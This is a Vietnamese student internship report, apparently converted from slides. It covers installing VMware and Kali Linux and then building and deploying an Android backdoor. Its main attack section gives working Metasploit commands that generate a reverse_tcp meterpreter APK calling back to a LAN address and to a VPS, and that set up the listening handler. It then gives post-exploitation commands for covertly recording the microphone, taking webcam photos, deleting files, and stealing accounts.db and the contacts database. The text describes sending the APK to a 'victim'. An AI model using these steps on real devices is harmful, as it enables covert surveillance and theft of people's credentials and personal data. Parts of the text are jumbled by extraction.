Một trong những vấn đề được các nhà phát triển Kali chú trọng nhiều nhất, chính là
sự hỗ trợ cho một số lượng lớn phần cứng bên trong các thiết bị mạng không dây hay USB
Dongles. Một yêu cầu quan trọng khi các chuyên gia bảo mật thực hiện đánh giá mạng
không dây.
Khả năng tùy biến cao
Kali rất linh hoạt khi đề cập đến giao diện hoặc khả năng tuỳ biến hệ thống. Đối với
giao diện, giờ đây người dùng đã có thể chọn cho mình nhiều loại Desktops như GNOME,
KDE hoặc XFCE tùy theo sở thích và thói quen sử dụng.
Dễ dàng nâng cấp giữa các phiên bản Kali trong tương lai
Đối với bất cứ ai sử dụng Kali, đây là một tính năng quan trọng khi bảo trì hệ điều
hành Kali. Với BackTrack, bất kỳ lúc nào khi phiên bản mới được công bố thì chúng ta
đều phải cài lại mới hoàn toàn (Ngoại trừ phiên bản R2 lên R3 năm ngoái).
21
BackTrack, Kali có rất nhiều cải tiến:
date) đối với các công cụ Penetration Test là một yêu cầu vô cùng quan trọng.
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
22. Giờ đây với Kali, nhờ vào sự chuyển đổi sang nền tảng hệ điều hành Debian, Kali đã
dễ dàng hơn trong việc âng cấp hệ thống khi phiên bản mới xuất hiện, người dùng không
phải cài lại mới hoàn toàn nữa.
3) Cài đặt Vmware và cài đặt Kali trên Vmware
Cần tải về file ISO phiên bản mới nhất của Kali Linux trên link dưới, bài này ta sẽ tiến
hành cài phiên bản Kali Linux 1.0.9 64 bit ( Khuyến cao nên dùng phiên bản Kali linux
1.0.9 32 bit, vì bản này thông dụng, phiên bản metasploit framework nhiều hơn bản 64
Bạn là 1 kỹ sư công nghệ thông tin, thì không nhiều thì ít các bạn cũng có sử dụng
qua công cụ tạo máy ảo, mình sẽ giới thiệu phần mềm VMware. VMware Workstation là
một phần mềm tạo máy ảo hàng đầu. Bạn có thể dùng VMware để tạo 1 máy tính ảo chạy
Windows, Linux, Mac OS hay thậm chí là Android nữa. VMware Workstation 10 là một
phần mềm giả lập hệ điều hành để bàn rất nổi tiếng của hãng VMware Inc. Với hơn 50 tính
năng mới, có thể thay đổi đáng kể cách thức làm việc với các máy ảo.
22
bit). http://ww.kalwi.org/downloads/
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
23. Để download được Vmware ta có thể download từ nhiều trang khác nhau, ta vào
https://www.google.com.vn/ và gõ Vmware 10 thì sẽ search được rất nhiều địa chỉ để ta
download.
Từ giao diện chính của VMware thì nhấn vào File -> New Vitual Machine (hoặc
dùng phím tắt Ctrl + N).
23
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
24. 24
Chọn Custom và nhấn next.
Tại bước này ta chọn installer và chọn đĩa iso kali cần cài đặt làm máy ảo
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
25. 25
Chọn tên và chỗ lưu máy ảo
Tiếp tục nhấn next, next và chọn thanh ram cho máy ảo
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
26. 26
Tiếp tục ta chọn Use Bridge networking->next
Ta chọn LSI logic->next
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
27. 27
Ta chọn SCSI->next
Ta chọn Create a new virtual disk->next
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
28. Sau khi nhấn Finish thì máy ảo sẽ tự động bật và sẽ tiến hành cài đặt. Tùy vào ổ cứng ram
mà ta chọn cho máy ảo thì sẽ cài đặ nhanh hoặc chậm
28
Tiếp tục nhấn next ,ta chọn dung lượng ổ cứng cho Máy Kali
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
29. Nếu máy tính bạn gặp trường hợp này thì hãy kiểm tra theo từng bước của lỗi.Trường hợp
này, máy tính chưa bật chức năng ảo hóa trong Bios, cách xử lí trường hợp này bằng cách,
restars máy tính => bấm F2 liên tục để vào Bios tìm mục Advance rồi chỉnh enable intel
VT.Khởi động lại và tiếp tục mở Vmware để cài đặt.
Bạn sẽ nhìn thấy màn hình khởi động của Kali. Chọn một trong hai chế độ cài đặt
là Graphical hoặc Text-Mode. Trong bài viết này tôi sẽ chọn Graphical Install
29
.
Nếu máy tính bạn không gặp trường hợp này thì tiếp tục và cài đặt bình thường.
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
30. 30
Chọn ngôn ngữ, vị trí đất nước của bạn sau đó click Continue
Chọn nước
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
31. Bạn cũng sẽ được yêu cầu để cấu hình bàn phím với bàn phím bạn đang sử dụng.
31
set Hostname
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
32. 32
set password user root
Tiếp đến bạn sẽ lựa chọn ổ đĩa bạn sẽ cài đặt Kali.
Partition disks (Step 1)
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
33. 33
Partition disks (Step 2)
Partition disks (Step 3)
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
34. 34
Partition disks (Step 4)
Partition disks (Step 5)
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
35. 35
Partition disks (Step 6)
Sau khi cấu hình Partition xong, nhấn Continue để quá trình cài đặt bắt đầu.
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
36. Cài đặt hệ thống
Cấu hình Mirror. Kali sử dụng một kho lưu trữ trung tâm để phân phối các ứng
dụng. Bạn sẽ cần phải nhập thông tin proxy thích hợp khi cần thiết. Chú ý: Nếu bạn
chọn “No” trong màn hình này, bạn sẽ không thể cài đặt các gói từ kho lưu trữ của
Kali.
36
Tiếp đến là cài đặt GRUB
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
37. 37
Cuối cùng, nhấp vào Continue để khởi động lại Kali
Màn hình đăng nhập và sau khi bạn đăng nhập vào Kali.
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
38. 38
Giao diện sau khi cài đặt xong Hệ điều hành Kali linux
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
39. Ta sử dụng Metasploit framework trên Kali Linux để tạo một payload, khi máy
android tải về và mở payload lên thì sẽ bị xâm nhập và điều khiển. Nếu sử dụng máy
ảo Kali Linux bằng Vmware.
msfpayload android/meterpreter/reverse_tcp lhost=192.168.29.129 lport=8080
Xem địa chỉ máy ip kali bằng cách mở 1 terminal mới và nhập lệnh “ifconfig” và ta
Payload là đoạn code mà sẽ chạy trên hệ thống remote machine, là một phần của virus
Câu lệnh giúp ta tạo ra 1 phần mềm độc hại tích hợp trên file.apk giúp ta mở ra kết
nối với victim (backdoor), nhiệm vụ của haker là gửi cho vicim “files.apk” này, khi victim
vô tình tải về “file.apk” ta sẽ có 1 phiên kết nối ngược gửi về địa chỉ host của máy kali :
192.168.29.129 thông qua port 8080 (port websever)
39
Phần 1: Làm trên mạng local Lan
1.Tạo mã độc trên Kali Linux
Đầu tiên mở 1 terminal và gõ dòng lệnh:
R > /root/Desktop/files.apk
sẽ nhận được 1 địa chỉ ip:192.168.29.129
máy tính để thực thi mã độc.
Tiếp theo, gõ lệnh msfconsole
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
40. Sau khi msfconsole load xong, ta tạo một handler để xử lí dữ liệu truyền về bằng cách
40
gõ lệnh sau:
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.29.129 – [nhập địa chỉ IP giống với khi tạo payload ở trên].
set lport 8080 – [nhập port giống với port khi tạo payload ở trên].
Exploit
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
41. Phần 4 ta đã tạo ra 1 file app.apk chứa mã độc, ta sẽ tung lên mạng, và dùng đt ảo
tải file app.apk về.
Để cài đặt được app này thì bạn phải check vào ô “Unknown sources” –cho phép
cài đặt tất cả các app không rõ nguồn gốc.
41
Màn hình sẽ như sau, lúc này ta đang chờ một máy android mở backdoor.
2.Đưa mã độc vào thiết bị android
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
42. Cài đặt files.apk, và mở lên được giao diện như dưới, nhấp vào nút “ReverseTCP ”:
42
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
43. Khi ta nhấp vào ReverseTcp thì lập tức backdoor sẽ mở ra và ta có 1 phiên kết nối
với victim.
43
Sử dụng lệnh help.
Sử dụng l ệnh Record_mic:
Lưu file ghi âm về máy trong thư mục root
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
44. File hình đã chụp từ camera của máy android là vEYWFBxp.jpeg được lưu ở thư
44
Sử dụng l ệnh Webcam_snap 1 để chụp hình
mục root của máy.
Sử dụng l ệnh Webcam_stream
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
45. Dùng lệnh cd /sdcard/Download để vào thư mục và dùng lệnh ls đề liệt kê ra các
file có trong thư mục Download.
Như trên hình, ta thấy 1 file là App.apk, để tải về máy, ta nhập lệnh Download
45
Sử dụng l ệnh Sysinfo:
3.Xâm nhập SD card của thiết bị android
Để vào sdcard, nhập lệnh: cd /sdcard và lệnh ls để xem danh sách file, thư mục
Ví dụ ở đây, ta tải file App.apk trong thư mục download của sdcard
App.apk. Và file này sẽ được tải về thư mục /root của máy Kali.
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
46. Máy chủ ảo (Virtual Private Server -VPS) là phương pháp phân chia một máy chủ vật
lý thành nhiều máy chủ ảo. Trong khi trên một server chạy một Share Host thì có thể có
hàng trăm tài khoản chạy cùng lúc, nhưng trên server chạy VPS thì con số này chỉ bằng
1/10. Do vậy, VPS có hiệu năng cao hơn Share Host rất nhiều.
Mỗi máy chủ là một hệ thống hoàn toàn riêng biệt, có hệ điều hành riêng, có toàn
quyền quản lý root và có thể restart lại hệ thống bất cứ lúc nào. Do vậy, VPS hạn chế 100%
khả năng bị hack local.
Trên 1 server chạy Share Host có nhiều Website chạy chung với nhau, chung tài
nguyên server, nếu 1 Website bị tấn công Ddos, botnet quá mạnh sẽ làm ảnh hưởng đến
các Website khác cùng server, riêng server VPS, một tài khoản trên VPS bị tấn công thì
mọi tài khoản khác trên VPS đều hoạt động bình thường.
VPS dành cho các doanh nghiệp vừa và những trang Web lớn hoặc mã nguồn nặng,
nếu chạy trên Share Host sẽ không đáp ứng đủ yêu cầu.Tuy nhiên, VPS đòi hỏi người sử
dụng phải có thêm một số kiến thức về bảo mật, cấu hình server,….
Hoạt động hoàn toàn như một server riêng nên sở hữu một phần CPU riêng, dung
Ngoài việc dùng VPS để thiết lập Web Server, Mail Server cũng như các ứng dụng
khác thì có thể cài đặt để thực hiện những yêu cầu riêng như truy cập Web bằng trình duyệt
Web trên VPS, dowload/upload bittorrent với tốc độ cao…
Trong trường hợp VPS bị thiếu tài nguyên thì có thể dễ dàng nâng cấp tài nguyên mà
46
Phần 2: Làm trên môi trường VPS
1. Giới thiệu về VPS
Định nghĩa
Đặc điểm về thông số VPS
lượng RAM riêng, dung lượng ổ HDD riêng, địa chỉ IP riêng và hệ điều hành riêng.
Tiết kiệm được nhiều chi phí so với việc thuê một server riêng.
không cần phải khởi động lại hệ thống.
Có thể cài lại hệ điều hành với thời gian từ 5-10 phút.
Giá trị khi sử dụng VPS
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
47. Server mạnh với nhiều cấu hình cho phép khách hàng dễ dàng lựa chọn gói VPS phù
Metasploit là một công cụ khai thác lỗ hổng của các hệ điều hành, dùng để kiểm tra,
tấn công và khai thác lỗi của các service. Metasploit được xây dựng từ ngôn ngữ hướng
đối tượng Perl, với những components được viết bằng C, assembler, và Python. Metasploit
có thể chạy trên hầu hết các hệ điều hành: Linux, Windows, Mac OS.
47
hợp.
Miễn phí chi phí cài đặt ban đầu cũng như cấu hình hoạt động cho khác hàng.
Hỗ trợ khác hàng cài đặt miễn phí thêm các phần mềm riêng.
Được cấu hình và cài đặt hệ thống Firewall và DDOS Protection.
Bộ phận kỹ thuật kịp thời can thiệp nhanh chóng nếu có sự cố phát sinh.
2. Cài đặt mã độc trên VPS
Giới thi ệu
Cài đặt Metasploit Framework
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
48. 48
Các bước tiếp theo ta thực hiện Step-by-Step là được:
Cổng của dịch vụ Metasploit sẽ sử dụng, mặc định là 3790:
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
49. 49
Chọn server và ngày hết hạn, để mặc định:
Quá trình cài đặt của Metasploit:
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
50. 50
Tiến trình hoàn tất, chọn Finish và truy cập đến giao diện web của chương trình:
Sau khi Finish trình duyệt web mở lên và đi tới giao diện
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
51. Click vào link: https://localhost:3790/ sẽ dẫn đến trang tạo tài khoản để login vào
Metasploit. Điền Username, Password sử dụng và một số thông tin bổ xung, rồi
chọn Create Account:
Trình duyệt chuyển đến trang nhập key để active chương trình, key này được gửi miễn
51
phí đến mail khi tải phần mềm. Sau khi điền key nhấn Activate License:
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
52. Sử dụng Kali Linux để tạo file APK làm backdoor để hack vào Android như trên mang
52
Giao diện chương trình Metasploit Console
3. Từ VPS xâm nhập vào thiết bị Android
a. Các bước thực hiện
LAN với địa chỉ IP là địa chỉ của VPS
Chúng ta vẫn sử dụng lệnh:
msfpayload android/meterpreter/reverse_tcp lhost=14.0.21.162 lport=4444 R >
/root/Desktop/files.apk
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
53. Chúng ta thực hiện các bước xâm nhập như đã đề cập ở phần trên, ở đây chỉ khác là sử
dụng chính IP của VPS
53
Ở đây địa chỉ VPS là 14.0.21.162
Khởi động Metasploit Console trên VPS
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
54. b.Tấn công điện thoại Android:
Tại máy VPS, mở Metasploit Console. Đợi phần mềm khởi động, có thể mất vài
chục phút.
Tiến hành thiết đặt payload bằng các lệnh
“ use exploit/multi/handler ”
“ set payload android/meterpreter/reverse_tcp ”
“ set lhost 14.0.21.162 ”
“ set lport 4444 ”
“show options”
“ run ”
Ta phải sử dụng đúng payload, lhost, lport mà ta đã dùng để tạo backdoor ở
Sau đó, Metasploit sẽ khởi động 1 handler để chờ đợi sự kết nối từ máy Android
nạn nhân. Giả sử nạn nhân truy cập vào ứng dụng backdoor, ta sẽ nhận được thông
báo như sau:
54
trên.
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
55. 55
Dùng lệnh “help” để kiểm tra các lệnh ta có thể thao tác
Ghi âm lén:
Sử dụng lệnh: “ record_mic <số giây ghi âm> ”
Sử dụng camera:
Xem danh sách webcam của thiết bị: “ webcam_list ”
Chụp ảnh lén: “webcam_snap <mã camera>”
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
56. Nếu kết quả trả về là “whoami: unknown uid 0” là máy đã được root. Ta có thể
tiếp tục tấn công.
56
Tải và xóa file bất kỳ từ bộ nhớ sdcard:
Di chuyển vào thư mục bằng lệnh: cd
Tải về bằng lệnh: download <tên file>
Xóa tập tin bằng lệnh: rm <tên file>
Truy cập trực ti ếp vào hệ thống:
Truy cập vào hệ thống bằng lệnh: “shell ” > “su”
Kiểm tra máy đã root hay chưa bằng lệnh: “whoami ”
Truy cập và khai thác tài khoản người dùng:
Thực hiện lệnh để vào xem file lưu tài khoản người dùng: “cd /data/system” > “ls –l”
Copy file về thẻ nhớ sdcard bằng lệnh: “cp accounts.db /sdcard”
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
57. 57
Trở về meterpreter (Nhấp Ctrl+C) và tải file accounts.db về:
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
58. 58
Sử dụng tiện ích SQLite Manager trên Firefox để xem nội dung của accounts.db
Truy cập và đánh cắp danh bạ điện thoại:
Thực hiện lệnh để vào xem file lưu trữ danh bạ điện thoại:
“cd /data/data/com.android.providers.contacts/databases”
Copy về thẻ sdcard và tải về máy
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
59. 59
Xem nội dung của contacts2.db bằng SQLite Manager
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
60. 60
Một số câu l ệnh khác:
- Để biết thêm về các lệnh có thể thực hiện ta dùng help
- Để xem thông tin về máy, nhập lệnh sysinfo
- Để xem các tác vụ đang chạy gõ ps
- Xem ip của máy bị hack ta gõ ipconfig
- Xem danh sách thư mục, file gõ ls
- Để upload gõ lệnh upload
- ls -l danh mục file và các quyền
- Để ăn cắp tài khoản, mật khẩu, file apk và thay đổi các quyền
/DATA
/DATA/APP
/DATA/SYSTEM
/DATA/SYSTEM/accounts.db
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
61. 61
/DATA/SYSTEM/SYNC/accounts.xml
/SYSTEM/APP/
- Để xem danh sách và down load các file hay thay đổi các file trong ROM
Đầu tiên phải gõ lệnh SU để có toàn quyền truy cập
Để có đường dẫn đầy đủ dùng lệnh chmod -R 777 path to filename
Ví dụ chmod -R 777 /data
Ctrl + C để quay lại
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
62. - VỆ SINH MÁY TÍNH
- SỬA LỖI DISK 100%
- SỬA LỖI RAM CHẠY Ì ẠCH, KHIẾN MÁY BỊ TẮT KHI DÙNG VMWARE,
Những kinh nghiệm thực tiễn đã tích lũy được:
Qua gần 2 tháng thực tập, bản thân em đã đúc kết được nhiều kinh nghiệm quý báu,
thứ nhất đó là các kĩ năng về chuyên môn, em đã được học và cũng cố các kiến thức mới
bên cạnh các kiến thức nền tảng. Hơn đó nữa là quá trình thực tập trong môi trường doanh
nghiệp đã cho em làm quen dần để không bỡ ngỡ trong quá trình đi làm sau này, thông qua
các kĩ năng giao tiếp và ứng xử.
62
C.KẾT QUẢ
NHỮNG VIỆC ĐÃ LÀM ĐƯỢC
2 MÁY ẢO ANDROID, MÁY QUAY PHIM BB
- KHẮC PHỤC LỖI DÙNG VPS TẤN CÔNG MÁY ANDROID KHÔNG
THÀNH CÔNG DO PHIÊN BẢN METASPLOIT CŨ
Những kiến thức lý thuyết đã được củng cố:
Tìm hiểu về lịch sử, quá trình phát triển của hệ điều hành Android
Tìm hiểu về hệ điều hành Kali Linux
Tìm hiểu về các lỗ hổng bảo mật của Windows và Android
Tìm hiểu về cách sửa đổi file APK và thực hiện Signing ứng dụng
Những kỹ năng thực hành đã được học thêm:
Thực hiện cài đặt Android trên máy ảo
Cài đặt Kali Linux, sử dụng nó để hack vào các lỗ hổng bảo mật của
Windows và Android
Thi lấy chứng chỉ System Hacking của trung tâm Athena
Thực hiện sửa đổi, tạo ra các file Trojan, Backdoor sau đó cài đặt vào
Android
Biết thêm về một số bài học trong lớp Hacker mũ trắng
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
63. http://www.quantrimang.com.vn/lo-hong-bao-mat-nghiem-trong-de-doa-82-may-android-
110510
63
D .DANH SÁCH CÁC CLIP:
- Clip giới thiệu về bản thân và trung tâm Athena:
https://www.youtube.com/watch?v=N501TeA2E4g
- Clip khó khăn thuận lợi: https://www.youtube.com/watch?v=RPk9iQ_RnPY
- Cài Vmware: https://www.youtube.com/watch?v=pZ-e7k87pdk
- Cài Kali Linux: https://www.youtube.com/watch?v=P0qA276m754
- Cài Genymotion android ảo: https://www.youtube.com/watch?v=wcRlmx2JNxQ
- Tạo mã độc trên Kali linux xâm nhập android ảo đánh cắp dữ liệu:
https://www.youtube.com/watch?v=HnW2rjVUx04
- Cài đặt phần mềm chứa mã độc icalendar
https://www.youtube.com/watch?v=0mdCkXwMnEc
- Tạo mã độc trên VPS cho phép đánh cắp dữ liệu android
https://www.youtube.com/watch?v=_JUgsUfIvIU
E. PHỤ LỤC : TRÍCH DẪN NGUỒN
THAM KHẢO
http://sinhvienit.net/forum
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086